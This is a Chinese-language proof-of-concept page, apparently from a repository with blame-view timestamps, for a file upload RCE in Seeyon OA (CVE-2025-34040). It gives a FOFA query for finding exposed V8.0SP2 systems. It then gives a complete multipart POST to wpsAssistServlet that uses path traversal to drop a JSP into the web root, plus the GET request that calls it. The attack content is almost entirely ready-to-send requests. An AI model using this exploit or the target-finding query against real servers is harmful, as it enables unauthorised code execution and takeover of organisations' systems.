2025-09-01 16:11:20 +08:00
|
|
|
|
# 致远OA存在文件上传导致RCE(CVE-2025-34040)
|
2025-09-01 16:10:05 +08:00
|
|
|
|
|
2025-09-01 16:11:20 +08:00
|
|
|
|
致远oa存在任意文件上传漏洞,可以获取服务器权限
|
|
|
|
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
|
|
|
|
|
|
|
|
```javascript
|
|
|
|
|
|
app="致远互联-OA" && title="V8.0SP2"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## poc
|
|
|
|
|
|
|
|
|
|
|
|
```javascript
|
|
|
|
|
|
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
|
|
|
|
|
|
Host:
|
|
|
|
|
|
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
|
|
|
|
|
|
Accept-Encoding: gzip
|
|
|
|
|
|
|
|
|
|
|
|
--59229605f98b8cf290a7b8908b34616b
|
|
|
|
|
|
Content-Disposition: form-data; name="upload"; filename="123.xls"
|
|
|
|
|
|
Content-Type: application/vnd.ms-excel
|
|
|
|
|
|
|
|
|
|
|
|
<% out.println("HelloWorld");%>
|
|
|
|
|
|
--59229605f98b8cf290a7b8908b34616b--
|
|
|
|
|
|
```
|
|
|
|
|
|
访问地址
|
|
|
|
|
|
```
|
|
|
|
|
|
GET /Hello.jsp HTTP/1.1
|
|
|
|
|
|
Host:
|
|
|
|
|
|
```
|
